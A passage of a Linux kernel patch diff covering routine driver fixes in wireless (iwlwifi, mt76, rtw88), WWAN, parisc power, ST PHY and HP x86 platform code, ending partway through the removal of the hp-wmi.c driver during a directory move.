+@@ -2852,7 +2852,7 @@ static bool iwl_write_to_user_buf(char __user *user_buf, ssize_t count,
+ 				  void *buf, ssize_t *size,
+ 				  ssize_t *bytes_copied)
+ {
+-	int buf_size_left = count - *bytes_copied;
++	ssize_t buf_size_left = count - *bytes_copied;
+ 
+ 	buf_size_left = buf_size_left - (buf_size_left % sizeof(u32));
+ 	if (*size > buf_size_left)
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h b/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
+index f33171bcd3432..c3b692eac6f65 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
+@@ -163,7 +163,7 @@ enum {
+ #define MT_TXS5_MPDU_TX_CNT		GENMASK(31, 23)
+ 
+ #define MT_TXS6_MPDU_FAIL_CNT		GENMASK(31, 23)
+-
++#define MT_TXS7_MPDU_RETRY_BYTE		GENMASK(22, 0)
+ #define MT_TXS7_MPDU_RETRY_CNT		GENMASK(31, 23)
+ 
+ /* RXD DW1 */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 19f02b632a204..68511597599e3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -570,7 +570,8 @@ bool mt76_connac2_mac_fill_txs(struct mt76_dev *dev, struct mt76_wcid *wcid,
+ 	/* PPDU based reporting */
+ 	if (FIELD_GET(MT_TXS0_TXS_FORMAT, txs) > 1) {
+ 		stats->tx_bytes +=
+-			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_BYTE);
++			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_BYTE) -
++			le32_get_bits(txs_data[7], MT_TXS7_MPDU_RETRY_BYTE);
+ 		stats->tx_packets +=
+ 			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_CNT);
+ 		stats->tx_failed +=
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 07578ccc4bab3..62fb28f14c94d 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -891,7 +891,7 @@ static void rtw_ops_sta_rc_update(struct ieee80211_hw *hw,
+ 	struct rtw_sta_info *si = (struct rtw_sta_info *)sta->drv_priv;
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED)
+-		rtw_update_sta_info(rtwdev, si, true);
++		ieee80211_queue_work(rtwdev->hw, &si->rc_work);
+ }
+ 
+ const struct ieee80211_ops rtw_ops = {
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 67151dbf83842..8080ace5ed51e 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -296,6 +296,17 @@ static u8 rtw_acquire_macid(struct rtw_dev *rtwdev)
+ 	return mac_id;
+ }
+ 
++static void rtw_sta_rc_work(struct work_struct *work)
++{
++	struct rtw_sta_info *si = container_of(work, struct rtw_sta_info,
++					       rc_work);
++	struct rtw_dev *rtwdev = si->rtwdev;
++
++	mutex_lock(&rtwdev->mutex);
++	rtw_update_sta_info(rtwdev, si, true);
++	mutex_unlock(&rtwdev->mutex);
++}
++
+ int rtw_sta_add(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 		struct ieee80211_vif *vif)
+ {
+@@ -306,12 +317,14 @@ int rtw_sta_add(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 	if (si->mac_id >= RTW_MAX_MAC_ID_NUM)
+ 		return -ENOSPC;
+ 
++	si->rtwdev = rtwdev;
+ 	si->sta = sta;
+ 	si->vif = vif;
+ 	si->init_ra_lv = 1;
+ 	ewma_rssi_init(&si->avg_rssi);
+ 	for (i = 0; i < ARRAY_SIZE(sta->txq); i++)
+ 		rtw_txq_init(rtwdev, sta->txq[i]);
++	INIT_WORK(&si->rc_work, rtw_sta_rc_work);
+ 
+ 	rtw_update_sta_info(rtwdev, si, true);
+ 	rtw_fw_media_status_report(rtwdev, si->mac_id, true);
+@@ -330,6 +343,8 @@ void rtw_sta_remove(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 	struct rtw_sta_info *si = (struct rtw_sta_info *)sta->drv_priv;
+ 	int i;
+ 
++	cancel_work_sync(&si->rc_work);
++
+ 	rtw_release_macid(rtwdev, si->mac_id);
+ 	if (fw_exist)
+ 		rtw_fw_media_status_report(rtwdev, si->mac_id, false);
+diff --git a/drivers/net/wireless/realtek/rtw88/main.h b/drivers/net/wireless/realtek/rtw88/main.h
+index cd9c068ae1a78..f8714f4492440 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.h
++++ b/drivers/net/wireless/realtek/rtw88/main.h
+@@ -734,6 +734,7 @@ struct rtw_txq {
+ DECLARE_EWMA(rssi, 10, 16);
+ 
+ struct rtw_sta_info {
++	struct rtw_dev *rtwdev;
+ 	struct ieee80211_sta *sta;
+ 	struct ieee80211_vif *vif;
+ 
+@@ -758,6 +759,8 @@ struct rtw_sta_info {
+ 
+ 	bool use_cfg_mask;
+ 	struct cfg80211_bitrate_mask *mask;
++
++	struct work_struct rc_work;
+ };
+ 
+ enum rtw_bfee_role {
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem.c b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+index 1e6a479766429..8ccd4d26b9060 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem.c
+@@ -565,24 +565,32 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 	struct ipc_mux_config mux_cfg;
+ 	struct iosm_imem *ipc_imem;
+ 	u8 ctrl_chl_idx = 0;
++	int ret;
+ 
+ 	ipc_imem = container_of(instance, struct iosm_imem, run_state_worker);
+ 
+ 	if (ipc_imem->phase != IPC_P_RUN) {
+ 		dev_err(ipc_imem->dev,
+ 			"Modem link down. Exit run state worker.");
+-		return;
++		goto err_out;
+ 	}
+ 
+ 	if (test_and_clear_bit(IOSM_DEVLINK_INIT, &ipc_imem->flag))
+ 		ipc_devlink_deinit(ipc_imem->ipc_devlink);
+ 
+-	if (!ipc_imem_setup_cp_mux_cap_init(ipc_imem, &mux_cfg))
+-		ipc_imem->mux = ipc_mux_init(&mux_cfg, ipc_imem);
++	ret = ipc_imem_setup_cp_mux_cap_init(ipc_imem, &mux_cfg);
++	if (ret < 0)
++		goto err_out;
++
++	ipc_imem->mux = ipc_mux_init(&mux_cfg, ipc_imem);
++	if (!ipc_imem->mux)
++		goto err_out;
++
++	ret = ipc_imem_wwan_channel_init(ipc_imem, mux_cfg.protocol);
++	if (ret < 0)
++		goto err_ipc_mux_deinit;
+ 
+-	ipc_imem_wwan_channel_init(ipc_imem, mux_cfg.protocol);
+-	if (ipc_imem->mux)
+-		ipc_imem->mux->wwan = ipc_imem->wwan;
++	ipc_imem->mux->wwan = ipc_imem->wwan;
+ 
+ 	while (ctrl_chl_idx < IPC_MEM_MAX_CHANNELS) {
+ 		if (!ipc_chnl_cfg_get(&chnl_cfg_port, ctrl_chl_idx)) {
+@@ -615,6 +623,13 @@ static void ipc_imem_run_state_worker(struct work_struct *instance)
+ 
+ 	/* Complete all memory stores after setting bit */
+ 	smp_mb__after_atomic();
++
++	return;
++
++err_ipc_mux_deinit:
++	ipc_mux_deinit(ipc_imem->mux);
++err_out:
++	ipc_uevent_send(ipc_imem->dev, UEVENT_CD_READY_LINK_DOWN);
+ }
+ 
+ static void ipc_imem_handle_irq(struct iosm_imem *ipc_imem, int irq)
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
+index 66b90cc4c3460..109cf89304888 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.c
+@@ -77,8 +77,8 @@ out:
+ }
+ 
+ /* Initialize wwan channel */
+-void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+-				enum ipc_mux_protocol mux_type)
++int ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
++			       enum ipc_mux_protocol mux_type)
+ {
+ 	struct ipc_chnl_cfg chnl_cfg = { 0 };
+ 
+@@ -87,7 +87,7 @@ void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+ 	/* If modem version is invalid (0xffffffff), do not initialize WWAN. */
+ 	if (ipc_imem->cp_version == -1) {
+ 		dev_err(ipc_imem->dev, "invalid CP version");
+-		return;
++		return -EIO;
+ 	}
+ 
+ 	ipc_chnl_cfg_get(&chnl_cfg, ipc_imem->nr_of_channels);
+@@ -104,9 +104,13 @@ void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+ 
+ 	/* WWAN registration. */
+ 	ipc_imem->wwan = ipc_wwan_init(ipc_imem, ipc_imem->dev);
+-	if (!ipc_imem->wwan)
++	if (!ipc_imem->wwan) {
+ 		dev_err(ipc_imem->dev,
+ 			"failed to register the ipc_wwan interfaces");
++		return -ENOMEM;
++	}
++
++	return 0;
+ }
+ 
+ /* Map SKB to DMA for transfer */
+diff --git a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
+index f8afb217d9e2f..026c5bd0f9992 100644
+--- a/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
++++ b/drivers/net/wwan/iosm/iosm_ipc_imem_ops.h
+@@ -91,9 +91,11 @@ int ipc_imem_sys_wwan_transmit(struct iosm_imem *ipc_imem, int if_id,
+  *				MUX.
+  * @ipc_imem:		Pointer to iosm_imem struct.
+  * @mux_type:		Type of mux protocol.
++ *
++ * Return: 0 on success and failure value on error
+  */
+-void ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
+-				enum ipc_mux_protocol mux_type);
++int ipc_imem_wwan_channel_init(struct iosm_imem *ipc_imem,
++			       enum ipc_mux_protocol mux_type);
+ 
+ /**
+  * ipc_imem_sys_devlink_open - Open a Flash/CD Channel link to CP
+diff --git a/drivers/parisc/power.c b/drivers/parisc/power.c
+index 456776bd8ee66..6f5e5f0230d39 100644
+--- a/drivers/parisc/power.c
++++ b/drivers/parisc/power.c
+@@ -37,7 +37,6 @@
+ #include <linux/module.h>
+ #include <linux/init.h>
+ #include <linux/kernel.h>
+-#include <linux/notifier.h>
+ #include <linux/panic_notifier.h>
+ #include <linux/reboot.h>
+ #include <linux/sched/signal.h>
+@@ -175,16 +174,21 @@ static void powerfail_interrupt(int code, void *x)
+ 
+ 
+ 
+-/* parisc_panic_event() is called by the panic handler.
+- * As soon as a panic occurs, our tasklets above will not be
+- * executed any longer. This function then re-enables the 
+- * soft-power switch and allows the user to switch off the system
++/*
++ * parisc_panic_event() is called by the panic handler.
++ *
++ * As soon as a panic occurs, our tasklets above will not
++ * be executed any longer. This function then re-enables
++ * the soft-power switch and allows the user to switch off
++ * the system. We rely in pdc_soft_power_button_panic()
++ * since this version spin_trylocks (instead of regular
++ * spinlock), preventing deadlocks on panic path.
+  */
+ static int parisc_panic_event(struct notifier_block *this,
+ 		unsigned long event, void *ptr)
+ {
+ 	/* re-enable the soft-power switch */
+-	pdc_soft_power_button(0);
++	pdc_soft_power_button_panic(0);
+ 	return NOTIFY_DONE;
+ }
+ 
+diff --git a/drivers/phy/st/phy-miphy28lp.c b/drivers/phy/st/phy-miphy28lp.c
+index 068160a34f5cc..e30305b77f0d1 100644
+--- a/drivers/phy/st/phy-miphy28lp.c
++++ b/drivers/phy/st/phy-miphy28lp.c
+@@ -9,6 +9,7 @@
+ 
+ #include <linux/platform_device.h>
+ #include <linux/io.h>
++#include <linux/iopoll.h>
+ #include <linux/kernel.h>
+ #include <linux/module.h>
+ #include <linux/of.h>
+@@ -484,19 +485,11 @@ static inline void miphy28lp_pcie_config_gen(struct miphy28lp_phy *miphy_phy)
+ 
+ static inline int miphy28lp_wait_compensation(struct miphy28lp_phy *miphy_phy)
+ {
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u8 val;
+ 
+ 	/* Waiting for Compensation to complete */
+-	do {
+-		val = readb_relaxed(miphy_phy->base + MIPHY_COMP_FSM_6);
+-
+-		if (time_after_eq(jiffies, finish))
+-			return -EBUSY;
+-		cpu_relax();
+-	} while (!(val & COMP_DONE));
+-
+-	return 0;
++	return readb_relaxed_poll_timeout(miphy_phy->base + MIPHY_COMP_FSM_6,
++					  val, val & COMP_DONE, 1, 5 * USEC_PER_SEC);
+ }
+ 
+ 
+@@ -805,7 +798,6 @@ static inline void miphy28lp_configure_usb3(struct miphy28lp_phy *miphy_phy)
+ 
+ static inline int miphy_is_ready(struct miphy28lp_phy *miphy_phy)
+ {
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u8 mask = HFC_PLL | HFC_RDY;
+ 	u8 val;
+ 
+@@ -816,21 +808,14 @@ static inline int miphy_is_ready(struct miphy28lp_phy *miphy_phy)
+ 	if (miphy_phy->type == PHY_TYPE_SATA)
+ 		mask |= PHY_RDY;
+ 
+-	do {
+-		val = readb_relaxed(miphy_phy->base + MIPHY_STATUS_1);
+-		if ((val & mask) != mask)
+-			cpu_relax();
+-		else
+-			return 0;
+-	} while (!time_after_eq(jiffies, finish));
+-
+-	return -EBUSY;
++	return readb_relaxed_poll_timeout(miphy_phy->base + MIPHY_STATUS_1,
++					  val, (val & mask) == mask, 1,
++					  5 * USEC_PER_SEC);
+ }
+ 
+ static int miphy_osc_is_ready(struct miphy28lp_phy *miphy_phy)
+ {
+ 	struct miphy28lp_dev *miphy_dev = miphy_phy->phydev;
+-	unsigned long finish = jiffies + 5 * HZ;
+ 	u32 val;
+ 
+ 	if (!miphy_phy->osc_rdy)
+@@ -839,17 +824,10 @@ static int miphy_osc_is_ready(struct miphy28lp_phy *miphy_phy)
+ 	if (!miphy_phy->syscfg_reg[SYSCFG_STATUS])
+ 		return -EINVAL;
+ 
+-	do {
+-		regmap_read(miphy_dev->regmap,
+-				miphy_phy->syscfg_reg[SYSCFG_STATUS], &val);
+-
+-		if ((val & MIPHY_OSC_RDY) != MIPHY_OSC_RDY)
+-			cpu_relax();
+-		else
+-			return 0;
+-	} while (!time_after_eq(jiffies, finish));
+-
+-	return -EBUSY;
++	return regmap_read_poll_timeout(miphy_dev->regmap,
++					miphy_phy->syscfg_reg[SYSCFG_STATUS],
++					val, val & MIPHY_OSC_RDY, 1,
++					5 * USEC_PER_SEC);
+ }
+ 
+ static int miphy28lp_get_resource_byname(struct device_node *child,
+diff --git a/drivers/platform/x86/Kconfig b/drivers/platform/x86/Kconfig
+index b02a8125bc7d5..1396a839dd8a4 100644
+--- a/drivers/platform/x86/Kconfig
++++ b/drivers/platform/x86/Kconfig
+@@ -424,24 +424,7 @@ config GPD_POCKET_FAN
+ 	  of the CPU temperature. Say Y or M if the kernel may be used on a
+ 	  GPD pocket.
+ 
+-config HP_ACCEL
+-	tristate "HP laptop accelerometer"
+-	depends on INPUT && ACPI
+-	depends on SERIO_I8042
+-	select SENSORS_LIS3LV02D
+-	select NEW_LEDS
+-	select LEDS_CLASS
+-	help
+-	  This driver provides support for the "Mobile Data Protection System 3D"
+-	  or "3D DriveGuard" feature of HP laptops. On such systems the driver
+-	  should load automatically (via ACPI alias).
+-
+-	  Support for a led indicating disk protection will be provided as
+-	  hp::hddprotect. For more information on the feature, refer to
+-	  Documentation/misc-devices/lis3lv02d.rst.
+-
+-	  To compile this driver as a module, choose M here: the module will
+-	  be called hp_accel.
++source "drivers/platform/x86/hp/Kconfig"
+ 
+ config WIRELESS_HOTKEY
+ 	tristate "Wireless hotkey button"
+@@ -455,30 +438,6 @@ config WIRELESS_HOTKEY
+ 	 To compile this driver as a module, choose M here: the module will
+ 	 be called wireless-hotkey.
+ 
+-config HP_WMI
+-	tristate "HP WMI extras"
+-	depends on ACPI_WMI
+-	depends on INPUT
+-	depends on RFKILL || RFKILL = n
+-	select INPUT_SPARSEKMAP
+-	select ACPI_PLATFORM_PROFILE
+-	select HWMON
+-	help
+-	 Say Y here if you want to support WMI-based hotkeys on HP laptops and
+-	 to read data from WMI such as docking or ambient light sensor state.
+-
+-	 To compile this driver as a module, choose M here: the module will
+-	 be called hp-wmi.
+-
+-config TC1100_WMI
+-	tristate "HP Compaq TC1100 Tablet WMI Extras"
+-	depends on !X86_64
+-	depends on ACPI
+-	depends on ACPI_WMI
+-	help
+-	  This is a driver for the WMI extensions (wireless and bluetooth power
+-	  control) of the HP Compaq TC1100 tablet.
+-
+ config IBM_RTL
+ 	tristate "Device driver to enable PRTL support"
+ 	depends on PCI
+diff --git a/drivers/platform/x86/Makefile b/drivers/platform/x86/Makefile
+index 5a428caa654a7..1d3d1b02541b9 100644
+--- a/drivers/platform/x86/Makefile
++++ b/drivers/platform/x86/Makefile
+@@ -55,9 +55,7 @@ obj-$(CONFIG_FUJITSU_TABLET)	+= fujitsu-tablet.o
+ obj-$(CONFIG_GPD_POCKET_FAN)	+= gpd-pocket-fan.o
+ 
+ # Hewlett Packard
+-obj-$(CONFIG_HP_ACCEL)		+= hp_accel.o
+-obj-$(CONFIG_HP_WMI)		+= hp-wmi.o
+-obj-$(CONFIG_TC1100_WMI)	+= tc1100-wmi.o
++obj-$(CONFIG_X86_PLATFORM_DRIVERS_HP)	+= hp/
+ 
+ # Hewlett Packard Enterprise
+ obj-$(CONFIG_UV_SYSFS)       += uv_sysfs.o
+diff --git a/drivers/platform/x86/hp-wmi.c b/drivers/platform/x86/hp-wmi.c
+deleted file mode 100644
+index 4a3851332ef2c..0000000000000
+--- a/drivers/platform/x86/hp-wmi.c
++++ /dev/null
+@@ -1,1570 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * HP WMI hotkeys
+- *
+- * Copyright (C) 2008 Red Hat <mjg@redhat.com>
+- * Copyright (C) 2010, 2011 Anssi Hannula <anssi.hannula@iki.fi>
+- *
+- * Portions based on wistron_btns.c:
+- * Copyright (C) 2005 Miloslav Trmac <mitr@volny.cz>
+- * Copyright (C) 2005 Bernhard Rosenkraenzer <bero@arklinux.org>
+- * Copyright (C) 2005 Dmitry Torokhov <dtor@mail.ru>
+- */
+-
+-#define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
+-
+-#include <linux/kernel.h>
+-#include <linux/module.h>
+-#include <linux/init.h>
+-#include <linux/slab.h>
+-#include <linux/types.h>
+-#include <linux/input.h>
+-#include <linux/input/sparse-keymap.h>
+-#include <linux/platform_device.h>
+-#include <linux/platform_profile.h>
+-#include <linux/hwmon.h>
+-#include <linux/acpi.h>
+-#include <linux/rfkill.h>
+-#include <linux/string.h>
+-#include <linux/dmi.h>
+-
+-MODULE_AUTHOR("Matthew Garrett <mjg59@srcf.ucam.org>");
+-MODULE_DESCRIPTION("HP laptop WMI hotkeys driver");
+-MODULE_LICENSE("GPL");
+-
+-MODULE_ALIAS("wmi:95F24279-4D7B-4334-9387-ACCDC67EF61C");
+-MODULE_ALIAS("wmi:5FB7F034-2C63-45e9-BE91-3D44E2C707E4");
+-
+-#define HPWMI_EVENT_GUID "95F24279-4D7B-4334-9387-ACCDC67EF61C"
+-#define HPWMI_BIOS_GUID "5FB7F034-2C63-45e9-BE91-3D44E2C707E4"
+-#define HP_OMEN_EC_THERMAL_PROFILE_OFFSET 0x95
+-#define zero_if_sup(tmp) (zero_insize_support?0:sizeof(tmp)) // use when zero insize is required
+-
+-/* DMI board names of devices that should use the omen specific path for
+- * thermal profiles.
+- * This was obtained by taking a look in the windows omen command center
+- * app and parsing a json file that they use to figure out what capabilities
+- * the device should have.
+- * A device is considered an omen if the DisplayName in that list contains
+- * "OMEN", and it can use the thermal profile stuff if the "Feature" array
+- * contains "PerformanceControl".
+- */
+-static const char * const omen_thermal_profile_boards[] = {
+-	"84DA", "84DB", "84DC", "8574", "8575", "860A", "87B5", "8572", "8573",
+-	"8600", "8601", "8602", "8605", "8606", "8607", "8746", "8747", "8749",
+-	"874A", "8603", "8604", "8748", "886B", "886C", "878A", "878B", "878C",
+-	"88C8", "88CB", "8786", "8787", "8788", "88D1", "88D2", "88F4", "88FD",
+-	"88F5", "88F6", "88F7", "88FE", "88FF", "8900", "8901", "8902", "8912",
+-	"8917", "8918", "8949", "894A", "89EB"
+-};
+-
+-/* DMI Board names of Omen laptops that are specifically set to be thermal
+- * profile version 0 by the Omen Command Center app, regardless of what
+- * the get system design information WMI call returns
+- */
+-static const char *const omen_thermal_profile_force_v0_boards[] = {
+-	"8607", "8746", "8747", "8749", "874A", "8748"
+-};
+-
+-enum hp_wmi_radio {
+-	HPWMI_WIFI	= 0x0,
+-	HPWMI_BLUETOOTH	= 0x1,
+-	HPWMI_WWAN	= 0x2,
+-	HPWMI_GPS	= 0x3,
+-};
+-
+-enum hp_wmi_event_ids {
+-	HPWMI_DOCK_EVENT		= 0x01,
+-	HPWMI_PARK_HDD			= 0x02,
+-	HPWMI_SMART_ADAPTER		= 0x03,
+-	HPWMI_BEZEL_BUTTON		= 0x04,
+-	HPWMI_WIRELESS			= 0x05,
+-	HPWMI_CPU_BATTERY_THROTTLE	= 0x06,
+-	HPWMI_LOCK_SWITCH		= 0x07,
+-	HPWMI_LID_SWITCH		= 0x08,
+-	HPWMI_SCREEN_ROTATION		= 0x09,
+-	HPWMI_COOLSENSE_SYSTEM_MOBILE	= 0x0A,
+-	HPWMI_COOLSENSE_SYSTEM_HOT	= 0x0B,
+-	HPWMI_PROXIMITY_SENSOR		= 0x0C,
+-	HPWMI_BACKLIT_KB_BRIGHTNESS	= 0x0D,
+-	HPWMI_PEAKSHIFT_PERIOD		= 0x0F,
+-	HPWMI_BATTERY_CHARGE_PERIOD	= 0x10,
+-	HPWMI_SANITIZATION_MODE		= 0x17,
+-	HPWMI_OMEN_KEY			= 0x1D,
+-	HPWMI_SMART_EXPERIENCE_APP	= 0x21,
+-};
+-
+-/*
+- * struct bios_args buffer is dynamically allocated.  New WMI command types
+- * were introduced that exceeds 128-byte data size.  Changes to handle
+- * the data size allocation scheme were kept in hp_wmi_perform_qurey function.
+- */
+-struct bios_args {
+-	u32 signature;
+-	u32 command;
+-	u32 commandtype;
+-	u32 datasize;
+-	u8 data[];
+-};
+-
+-enum hp_wmi_commandtype {
+-	HPWMI_DISPLAY_QUERY		= 0x01,
+-	HPWMI_HDDTEMP_QUERY		= 0x02,
+-	HPWMI_ALS_QUERY			= 0x03,
+-	HPWMI_HARDWARE_QUERY		= 0x04,
+-	HPWMI_WIRELESS_QUERY		= 0x05,
+-	HPWMI_BATTERY_QUERY		= 0x07,
+-	HPWMI_BIOS_QUERY		= 0x09,
+-	HPWMI_FEATURE_QUERY		= 0x0b,
+-	HPWMI_HOTKEY_QUERY		= 0x0c,
+-	HPWMI_FEATURE2_QUERY		= 0x0d,
+-	HPWMI_WIRELESS2_QUERY		= 0x1b,
+-	HPWMI_POSTCODEERROR_QUERY	= 0x2a,
+-	HPWMI_SYSTEM_DEVICE_MODE	= 0x40,
+-	HPWMI_THERMAL_PROFILE_QUERY	= 0x4c,
+-};
+-
+-enum hp_wmi_gm_commandtype {
+-	HPWMI_FAN_SPEED_GET_QUERY = 0x11,
+-	HPWMI_SET_PERFORMANCE_MODE = 0x1A,
+-	HPWMI_FAN_SPEED_MAX_GET_QUERY = 0x26,
+-	HPWMI_FAN_SPEED_MAX_SET_QUERY = 0x27,
+-	HPWMI_GET_SYSTEM_DESIGN_DATA = 0x28,
+-};
+-
+-enum hp_wmi_command {
+-	HPWMI_READ	= 0x01,
+-	HPWMI_WRITE	= 0x02,
+-	HPWMI_ODM	= 0x03,
+-	HPWMI_GM	= 0x20008,
+-};
+-
+-enum hp_wmi_hardware_mask {
+-	HPWMI_DOCK_MASK		= 0x01,
+-	HPWMI_TABLET_MASK	= 0x04,
+-};
+-
+-struct bios_return {
+-	u32 sigpass;
+-	u32 return_code;
+-};
+-
+-enum hp_return_value {
+-	HPWMI_RET_WRONG_SIGNATURE	= 0x02,
+-	HPWMI_RET_UNKNOWN_COMMAND	= 0x03,
+-	HPWMI_RET_UNKNOWN_CMDTYPE	= 0x04,
+-	HPWMI_RET_INVALID_PARAMETERS	= 0x05,
+-};
+-
+-enum hp_wireless2_bits {
+-	HPWMI_POWER_STATE	= 0x01,
+-	HPWMI_POWER_SOFT	= 0x02,
+-	HPWMI_POWER_BIOS	= 0x04,
+-	HPWMI_POWER_HARD	= 0x08,
+-	HPWMI_POWER_FW_OR_HW	= HPWMI_POWER_BIOS | HPWMI_POWER_HARD,
+-};
+-
+-enum hp_thermal_profile_omen_v0 {
+-	HP_OMEN_V0_THERMAL_PROFILE_DEFAULT     = 0x00,
+-	HP_OMEN_V0_THERMAL_PROFILE_PERFORMANCE = 0x01,
+-	HP_OMEN_V0_THERMAL_PROFILE_COOL        = 0x02,
+-};
+-
+-enum hp_thermal_profile_omen_v1 {
+-	HP_OMEN_V1_THERMAL_PROFILE_DEFAULT	= 0x30,
+-	HP_OMEN_V1_THERMAL_PROFILE_PERFORMANCE	= 0x31,
+-	HP_OMEN_V1_THERMAL_PROFILE_COOL		= 0x50,
+-};
+-
+-enum hp_thermal_profile {
+-	HP_THERMAL_PROFILE_PERFORMANCE	= 0x00,
+-	HP_THERMAL_PROFILE_DEFAULT		= 0x01,
+-	HP_THERMAL_PROFILE_COOL			= 0x02,
+-	HP_THERMAL_PROFILE_QUIET		= 0x03,
+-};
+-
+-#define IS_HWBLOCKED(x) ((x & HPWMI_POWER_FW_OR_HW) != HPWMI_POWER_FW_OR_HW)
+-#define IS_SWBLOCKED(x) !(x & HPWMI_POWER_SOFT)
+-
+-struct bios_rfkill2_device_state {
+-	u8 radio_type;
+-	u8 bus_type;
+-	u16 vendor_id;
+-	u16 product_id;
+-	u16 subsys_vendor_id;
+-	u16 subsys_product_id;
+-	u8 rfkill_id;
+-	u8 power;
+-	u8 unknown[4];
+-};
+-
+-/* 7 devices fit into the 128 byte buffer */
+-#define HPWMI_MAX_RFKILL2_DEVICES	7
+-
+-struct bios_rfkill2_state {
+-	u8 unknown[7];
+-	u8 count;
+-	u8 pad[8];
+-	struct bios_rfkill2_device_state device[HPWMI_MAX_RFKILL2_DEVICES];
+-};
+-
+-static const struct key_entry hp_wmi_keymap[] = {
+-	{ KE_KEY, 0x02,    { KEY_BRIGHTNESSUP } },
+-	{ KE_KEY, 0x03,    { KEY_BRIGHTNESSDOWN } },
+-	{ KE_KEY, 0x20e6,  { KEY_PROG1 } },
+-	{ KE_KEY, 0x20e8,  { KEY_MEDIA } },
+-	{ KE_KEY, 0x2142,  { KEY_MEDIA } },
+-	{ KE_KEY, 0x213b,  { KEY_INFO } },
+-	{ KE_KEY, 0x2169,  { KEY_ROTATE_DISPLAY } },
+-	{ KE_KEY, 0x216a,  { KEY_SETUP } },
+-	{ KE_KEY, 0x21a5,  { KEY_PROG2 } }, /* HP Omen Key */
+-	{ KE_KEY, 0x21a7,  { KEY_FN_ESC } },
+-	{ KE_KEY, 0x21a9,  { KEY_TOUCHPAD_OFF } },
+-	{ KE_KEY, 0x121a9, { KEY_TOUCHPAD_ON } },
+-	{ KE_KEY, 0x231b,  { KEY_HELP } },
+-	{ KE_END, 0 }
+-};
+-
+-static struct input_dev *hp_wmi_input_dev;
+-static struct platform_device *hp_wmi_platform_dev;
+-static struct platform_profile_handler platform_profile_handler;
+-static bool platform_profile_support;
+-static bool zero_insize_support;
+-
+-static struct rfkill *wifi_rfkill;
+-static struct rfkill *bluetooth_rfkill;
+-static struct rfkill *wwan_rfkill;
+-
+-struct rfkill2_device {
+-	u8 id;
+-	int num;
+-	struct rfkill *rfkill;
+-};
+-
+-static int rfkill2_count;
+-static struct rfkill2_device rfkill2[HPWMI_MAX_RFKILL2_DEVICES];
+-
+-/*
+- * Chassis Types values were obtained from SMBIOS reference
+- * specification version 3.00. A complete list of system enclosures
+- * and chassis types is available on Table 17.
+- */
+-static const char * const tablet_chassis_types[] = {
+-	"30", /* Tablet*/
+-	"31", /* Convertible */
+-	"32"  /* Detachable */
+-};
+-
+-#define DEVICE_MODE_TABLET	0x06
+-
+-/* map output size to the corresponding WMI method id */
+-static inline int encode_outsize_for_pvsz(int outsize)
+-{
+-	if (outsize > 4096)
+-		return -EINVAL;
+-	if (outsize > 1024)
+-		return 5;
+-	if (outsize > 128)
+-		return 4;
+-	if (outsize > 4)
+-		return 3;
+-	if (outsize > 0)
+-		return 2;
+-	return 1;
+-}
+-
+-/*
+- * hp_wmi_perform_query
+- *
+- * query:	The commandtype (enum hp_wmi_commandtype)
+- * write:	The command (enum hp_wmi_command)
+- * buffer:	Buffer used as input and/or output
+- * insize:	Size of input buffer
+- * outsize:	Size of output buffer
+- *
+- * returns zero on success
+- *         an HP WMI query specific error code (which is positive)
+- *         -EINVAL if the query was not successful at all
+- *         -EINVAL if the output buffer size exceeds buffersize
+- *
+- * Note: The buffersize must at least be the maximum of the input and output
+- *       size. E.g. Battery info query is defined to have 1 byte input
+- *       and 128 byte output. The caller would do:
+- *       buffer = kzalloc(128, GFP_KERNEL);
+- *       ret = hp_wmi_perform_query(HPWMI_BATTERY_QUERY, HPWMI_READ, buffer, 1, 128)
+- */
+-static int hp_wmi_perform_query(int query, enum hp_wmi_command command,
+-				void *buffer, int insize, int outsize)
+-{
+-	struct acpi_buffer input, output = { ACPI_ALLOCATE_BUFFER, NULL };
+-	struct bios_return *bios_return;
